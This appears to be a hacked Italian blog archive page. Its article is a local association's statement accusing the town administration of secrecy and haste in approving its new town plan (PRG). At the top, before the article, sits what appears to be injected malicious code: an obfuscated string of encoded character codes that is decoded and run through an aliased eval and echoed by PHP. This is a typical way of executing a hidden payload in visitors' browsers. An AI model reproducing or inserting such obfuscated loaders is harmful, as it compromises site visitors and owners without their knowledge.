q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Gennaio, 2010

Il PRG

admin Gennaio 10th, 2010

Dichiarazione del Consiglio dell’Associazione Trebis

Il tentativo dell’Amministrazione Comunale di creare un’impressione di trasparenza e di democrazia con la presentazione al pubblico della prima parte del nuovo Piano Regolatore Generale il 17 ottobre scorso è fallito. Al contrario, tutto sembra diretto a tenere i cittadini all’oscuro di questo documento importantissimo che dovrebbe determinare il futuro assetto della città in cui viviamo. L’Amministrazione deve agire presto e con decisione per dissipare il forte sospetto che il PRG, nonostante le belle parole, contenga degli elementi altamente discutibili e che, almeno in parte, serva non tanto l’interesse della comunità quanto a interessi politici ed elettorali.

Offuscamento e poca disponibilità alla trasparenza

La presentazione della parte strutturale del PRG in ottobre è stata svolta in termini talmente tecnici da essere - come abbiamo già lamentato - praticamente incomprensibile al pubblico e persino ai tecnici presenti.

Quello che abbiamo sentito fino a ora sembra fatto appositamente per confondere le idee. Per dare un esempio solo: in ottobre si parlava di un aumento dell’area urbanizzata del 5 per cento in metri cubi. Nel consiglio comunale del 29 dicembre si parlava invece di un incremento di 7 per cento in metri quadrati! Cambiano continuamente le regole del gioco. Quali altri cambiamenti possono sfuggire a delle presentazioni ufficiali se non si ha il documento al cui riferirsi?

Una richiesta formale dalla Trebis fatta tre mesi fa di una copia cartacea del Piano come presentato all’assemblea, richiesta seguita da varie sollecitazioni telefoniche, non è stata esaudita.

Persino i consiglieri comunali hanno potuto prendere visione del proposto PRG solo poche ore prima della riunione del Consiglio Comunale del 29 Dicembre e ancora non hanno ricevuto copie personali. Si voleva passare quella sera stessa al voto, ma alcuni consiglieri sono riusciti a farlo rimandare alla prossima riunione.

Una grande fretta

Improvvisamente si ha una grande fretta per fare       approvare il documento. A noi risulta che si terrà la prossima riunione entro pochissimi giorni. Troppo poco, al nostro parere, per permettere una valutazione seria e approfondita di un documento di tale portata.

E vero che i cittadini hanno il diritto di presentare le loro osservazioni entro 60 giorni dall’approvazione del PRG. Ma è una cosa cercare di modificare una decisione già presa e un’altra di essere consultati, come cittadini, a monte. Infatti la partecipazione dei cittadini è stata limitata a qualche consultazione sulla Valutazione Strategica Ambientale.

Non è questa la trasparenza e il rispetto per la democrazia che si aspetta dai nostri rappresentanti politici.

–>